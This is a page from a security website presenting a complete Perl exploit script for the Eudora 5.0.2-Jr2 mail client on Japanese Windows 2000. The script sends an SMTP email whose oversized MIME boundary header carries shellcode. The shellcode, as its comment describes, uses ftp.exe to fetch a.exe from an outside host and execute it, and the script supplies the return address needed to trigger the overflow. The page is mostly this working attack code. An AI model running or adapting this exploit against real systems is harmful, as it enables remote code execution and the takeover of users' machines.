Tools Exploits Advisories Articles Home 

Exploits  ->  Eudora 5.0.2-Jr2 exploit


eudora502jr2_exploit.txt

#!/usr/local/bin/perl

#------------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
http://www.jumperz.net/
#------------------------------------------------------------------------

use Socket;

$connect_host = 'localhost';
$port         = 25;
$env_from     = 'anvil@jumperz.net';
$env_to       = 'eudora@jumperz.net';
$from         = 'anvil@jumperz.net';
$to           = 'eudora@jumperz.net';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

      # egg 161bytes
      # It downloads "a.exe" from 192.168.3.2 by FTP.exe and execute it.
      # 
      # written in C:
      # FILE* handle;
      # char filename[]      = "q";
      # char command[]      = "binary\nget a.exe\nquit";
      # 
      # handle = fopen( filename, "w" );
      # fputs( command, handle );
      # fclose( handle );
      # system( "ftp.exe -s:q -A 192.168.3.2" );
      # system( "a.exe" );
      #
      # You can't use 0x00, 0x0D, 0x0A and 0x1B in this egg.
      #
$egg  = "\xEB\x5E\x90\x90";
$egg .= "\x90\x5B\x33\xC0\x88\x63\x01\x88";
$egg .= "\x63\x03\x88\x63\x19\x88\x63\x35";
$egg .= "\x88\x63\x3B\x43\xFF\x43\x09\xFF";
$egg .= "\x43\x13\x4B\x53\x83\xC3\x02\x53";
$egg .= "\xB9\xC2\x19\x02\x78\xFE\xC5\xFE";
$egg .= "\xC5\xFF\xD1\x50\x83\xC3\x02\x53";
$egg .= "\xB9\x8B\x38\x02\x78\xFF\xD1\x59";
$egg .= "\xB9\xB8\x0E\x01\x78\xFF\xD1\x83";
$egg .= "\xC3\x16\x53\xB9\x4A\x9B\x01\x78";
$egg .= "\xFF\xD1\x83\xC3\x1C\x53\xB9\x4A";
$egg .= "\x9B\x01\x78\xFF\xD1\xB8\x94\x8F";
$egg .= "\xE6\x77\xFF\xD0\xE8\xA0\xFF\xFF";
$egg .= "\xFF\x77\x41\x71\x41\x62\x69\x6E";
$egg .= "\x61\x72\x79\x09\x67\x65\x74\x20";
$egg .= "\x61\x2E\x65\x78\x65\x09\x71\x75";
$egg .= "\x69\x74\x41\x66\x74\x70\x2E\x65";
$egg .= "\x78\x65\x20\x2D\x73\x3A\x71\x20";
$egg .= "\x2D\x41\x20\x31\x39\x32\x2E\x31";
$egg .= "\x36\x38\x2E\x33\x2E\x32\x41\x61";
$egg .= "\x2E\x65\x78\x65\x41";

$buf  = $egg;
$buf .= "\x90";
$buf .= "\xE9\x59\xFF\xFF\xFF";  # JMP -0xA7
$buf .= "A" x 11;
$buf .= "\xEB\xEE";              # JMP -0x12
$buf .= "B" x 2;
$buf .= "\x50\xA8\x02\x78";      # 0x7802A850 ( CALL EBX in msvcrt.dll )

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;print $hoge;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;


Links


LAC



>> Tools:
Doorman Eclipse Plugin
Amberjack@JUMPERZ.NET
Guardian@JUMPERZ.NET


>> Latest files:
MonjaDB


>> Contact:
Kanatoko
twitter: @kinyuka


Copyrightę 1998-2012 JUMPERZ.NET All Rights Reserved.